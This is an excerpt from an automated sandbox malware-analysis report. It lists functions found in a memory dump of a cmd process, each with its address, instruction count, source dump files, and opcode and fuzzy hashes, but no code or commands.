                                                                        Function 030FC020 Relevance: .0, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                        • Instruction ID: c2c31988d6587fd16e4753f4e04dd5f38e173dc72f61e6ab5930258f563d8dc5
                                                                        • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                        • Instruction Fuzzy Hash: D601B536100749DFEB22DB66D800AA7B7E9FFC9210F098859AA668B950DF70E542CB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 031420F0 Relevance: .0, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: da5e05d487e46833435b4d70f7b4f6fb5cf8aa97be5fe7b20325f9b39173eb61
                                                                        • Instruction ID: f25da53a1f78492956da4c523f084ef4bbe04244b83f4929f6103df65808aea6
                                                                        • Opcode Fuzzy Hash: da5e05d487e46833435b4d70f7b4f6fb5cf8aa97be5fe7b20325f9b39173eb61
                                                                        • Instruction Fuzzy Hash: 56116D35A0120CAFDB04EFA4C850BAE7BB9EF48740F0040A9F9019B250DB35EE52CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0313E5CF Relevance: .0, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 929295d36b07027a48f93a0184aac4ada48b271bd8d121beb4f4a127993f0cf8
                                                                        • Instruction ID: b06cd208945f5247e3adf0183dab60b26418a13db107de9890e78af91fd4d0d4
                                                                        • Opcode Fuzzy Hash: 929295d36b07027a48f93a0184aac4ada48b271bd8d121beb4f4a127993f0cf8
                                                                        • Instruction Fuzzy Hash: D7018475301B447FC351FB69CD80E97B7ACEF8D660B040939B10987551DB34EC22C6A0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0318C460 Relevance: .0, Instructions: 48COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 72c88515a7b5f5c4be0a100fd3a3abf47917c830333668d38192909c63e50768
                                                                        • Instruction ID: 603e21e079aabbd83b7a8f2424498756f31d6889ed601b6b7d2f089fefd628b9
                                                                        • Opcode Fuzzy Hash: 72c88515a7b5f5c4be0a100fd3a3abf47917c830333668d38192909c63e50768
                                                                        • Instruction Fuzzy Hash: E4111B75A01208ABCB15EFA5C844EAEBBB5EB48350F104059B9029B350DB35EA51CBA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0318CA11 Relevance: .0, Instructions: 48COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7d177d0ad8200703de9d46950d396c2acf444b6d2f7b1505d66c08517215cd56
                                                                        • Instruction ID: 7cda807045f4097d6264ee4f5adfd1f88bf364236a61d02e6ee560117a89afed
                                                                        • Opcode Fuzzy Hash: 7d177d0ad8200703de9d46950d396c2acf444b6d2f7b1505d66c08517215cd56
                                                                        • Instruction Fuzzy Hash: 6D117C756083049FC700DF69C44199BBBE4EF8D350F00891AB998D7350E730E900CBA6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 031D4A80 Relevance: .0, Instructions: 48COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                                                        • Instruction ID: d545e616fae48958c04861318c559efe28d21ab512d2a0caaf9f11b6c7454c20
                                                                        • Opcode Fuzzy Hash: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                                                        • Instruction Fuzzy Hash: E901D4372007419FDB25DA6AD845F96B7EAFBCA210F085859F5438B690EFB0F890C794
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0318C97C Relevance: .0, Instructions: 48COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: aa86b4cfe200de262519478bc7808d84a6f0e78030d96b36e133709f4d728c0b
                                                                        • Instruction ID: 88433f80163e457ea09e8b62528b96328c79b006819394ab32db7e614e618bdc
                                                                        • Opcode Fuzzy Hash: aa86b4cfe200de262519478bc7808d84a6f0e78030d96b36e133709f4d728c0b
                                                                        • Instruction Fuzzy Hash: 69117C756083049FC700DF69C44195BBBE4EF8C310F00895AB998D7350D770E901CBA6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 030F826B Relevance: .0, Instructions: 46COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4ee08b416ccad42366fdb2a3de0eee1909edabf79ed3db52704cf707afa5e5af
                                                                        • Instruction ID: c525f7ceccb55c0231ca86f4978fea3ec05ef04b735fba640426f7196c0040c6
                                                                        • Opcode Fuzzy Hash: 4ee08b416ccad42366fdb2a3de0eee1909edabf79ed3db52704cf707afa5e5af
                                                                        • Instruction Fuzzy Hash: A101AC36701604DFC748EB65DC049EEB7F9EF89120B198029DE019BA40DF70ED02C650
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0311E016 Relevance: .0, Instructions: 46COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                        • Instruction ID: afc2f7e7de18f4b5863349be005aee2ea826fd7dc266229095cdcd1a133a8395
                                                                        • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                        • Instruction Fuzzy Hash: 07014872304684DFD326D769C948F66B7D8EB48B50F0D04A1FC15CB691D768D890C622
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 031AEB50 Relevance: .0, Instructions: 46COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 17bdc2a09bd5068f5985ef7041874900b114c53e38ae001cb4d4824c779d6630
                                                                        • Instruction ID: c0d463c3ad5a71084300030d16bf9b05827234a7e96de2836258ac7204e17a8b
                                                                        • Opcode Fuzzy Hash: 17bdc2a09bd5068f5985ef7041874900b114c53e38ae001cb4d4824c779d6630
                                                                        • Instruction Fuzzy Hash: D201F775241B009FC331DB5AD940F52BAE8DF4DB50F010829F3059F390C7B0A8528BA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03102582 Relevance: .0, Instructions: 45COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d82d8c4718492a63274c53535602b4643d53771f0bb7bbe2a57f4266a6a90d42
                                                                        • Instruction ID: 513f129b19cb6348a8758a3766e3891ad9a04f2b6705766eedeb3cf0f645fad0
                                                                        • Opcode Fuzzy Hash: d82d8c4718492a63274c53535602b4643d53771f0bb7bbe2a57f4266a6a90d42
                                                                        • Instruction Fuzzy Hash: 5AF0F936741B10BBC731DB968C44F87BAADDB88B90F154429B61597640D770ED02C7A0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 030FC310 Relevance: .0, Instructions: 43COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                        • Instruction ID: e26f0f6a242a76d76fac703b24497dac46ba973d04890aea12e3ee052b85717c
                                                                        • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                        • Instruction Fuzzy Hash: 44F04C332067279FE732D6594881B6BE5958FC5AE4F1E0435F3059FA04CA608C0252D5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 031D634F Relevance: .0, Instructions: 43COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: bf1245186580c13365e4f51a7be2271edc5a0a98011a995ac02e8b6162a97855
                                                                        • Instruction ID: f308e0b7c33e229e9f1edaf940781a6ea14ad1d64a112cc927f93454acad2089
                                                                        • Opcode Fuzzy Hash: bf1245186580c13365e4f51a7be2271edc5a0a98011a995ac02e8b6162a97855
                                                                        • Instruction Fuzzy Hash: C0012C75E10209AFCB04DFA9D551AAEB7B8EF4C304F54406AE914EB350D774DA018BA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 031D625D Relevance: .0, Instructions: 43COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2203e40960d6e907f1042901c684ac61030bd5be91fda729820787c54e4f951c
                                                                        • Instruction ID: 7c9a76ded668b16fa228ba03352c18fd4a8ee45865521b6f3e2294fdb1f3ffcc
                                                                        • Opcode Fuzzy Hash: 2203e40960d6e907f1042901c684ac61030bd5be91fda729820787c54e4f951c
                                                                        • Instruction Fuzzy Hash: 3C012C75A10309AFCB04DFA9D451AAEB7B8EF4C304F54806AF914EB351D774AA018BA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 031D62D6 Relevance: .0, Instructions: 43COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b8f517c396455003cd4c5835b51fa938ff40b1ffdec7e99732645caf619b2655
                                                                        • Instruction ID: a67feba5e1572fcd07b4d3685e3f1abc998f4007bb3fa9572c258e197aba2062
                                                                        • Opcode Fuzzy Hash: b8f517c396455003cd4c5835b51fa938ff40b1ffdec7e99732645caf619b2655
                                                                        • Instruction Fuzzy Hash: DC012C75A00209AFCB04DFA9D441AAEB7B8EF4C304F54846AE914EB390D7749A01CBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0312C073 Relevance: .0, Instructions: 43COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                        • Instruction ID: e790717bd29f695a395efbfd40a9431ebfd44b86068b99bb81536c363c14fced
                                                                        • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                        • Instruction Fuzzy Hash: 05F0AFB6A00A20ABD324CF4D9840E57FBEADBC4A80F088128A505CB220EA31DD04CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0313CA6F Relevance: .0, Instructions: 42COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                        • Instruction ID: 27caed9e5bf7f693a3406e82ae73f9d6b0b7ae449a4f2210d65c2853ac229ea1
                                                                        • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                        • Instruction Fuzzy Hash: DF01F935200788ABD726D719C809F99BBE9EF4A754F0D44A1F9059F691E7B4C840C250
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 031863C0 Relevance: .0, Instructions: 41COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                        • Instruction ID: ca41c7a4e1408f0b16f9752810696a53c8d08f6bbe253f198b289fee3b9e883f
                                                                        • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                        • Instruction Fuzzy Hash: 2AF01D7620011DBFEF02AF95DD80DEFBB7DEB49298B104125FA1196160D731DD21ABA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 031D61E5 Relevance: .0, Instructions: 41COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0f1379c83f6f48140a3e0e5bacae9adb87f724471343fb1adf3ab5caa7a3273e
                                                                        • Instruction ID: 3c95c035cf211e0dfec92f5071b9140d8e0c991e1d8396bb147a4ba19f5e8b09
                                                                        • Opcode Fuzzy Hash: 0f1379c83f6f48140a3e0e5bacae9adb87f724471343fb1adf3ab5caa7a3273e
                                                                        • Instruction Fuzzy Hash: EF014F75A002499FCB04DFA9D845AEEB7B8EF4D310F54405AE501EB280D774EA01CBA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0318A4B0 Relevance: .0, Instructions: 40COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5bd706912c488c0ead31dd2159b23e4e28dad0a190d7f085bddd5295220a01fd
                                                                        • Instruction ID: 67d90f9f344e3f4437db917f15cc678a747b233e30e1e5f7e3b05f9dc333d5b9
                                                                        • Opcode Fuzzy Hash: 5bd706912c488c0ead31dd2159b23e4e28dad0a190d7f085bddd5295220a01fd
                                                                        • Instruction Fuzzy Hash: C2018936101149ABCF12AF84D840EDA7F66FF4C664F0A8112FE1866220C332D9B0EF81
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 030FC0F0 Relevance: .0, Instructions: 39COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c656a79de88c1230670311807183cc0887e1ff426ca7a613e9dbf2de2aa76f76
                                                                        • Instruction ID: 8fd489056484160bee2cb5304ee926720c8249a4d1bcc2b18ab81215eda423b9
                                                                        • Opcode Fuzzy Hash: c656a79de88c1230670311807183cc0887e1ff426ca7a613e9dbf2de2aa76f76
                                                                        • Instruction Fuzzy Hash: 77F02B712063485FF354E61DCC02B2232D9F7C5650F6D8069EB058FAC0EBB1DC118395
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0313656A Relevance: .0, Instructions: 39COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 25b2d52018287e3e882fdfd09678a126d390fb1e4239d6b5eaca867e9998d234
                                                                        • Instruction ID: 189135043657c0fcf6aeb889fc7f2152417e44fd660d93167627442a19738caf
                                                                        • Opcode Fuzzy Hash: 25b2d52018287e3e882fdfd09678a126d390fb1e4239d6b5eaca867e9998d234
                                                                        • Instruction Fuzzy Hash: 1901A474301780AFE726EB28CD88B2577A9AF4EB44F8D05A0B9118F6D5DB28D4818520
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 031A437C Relevance: .0, Instructions: 37COMMON
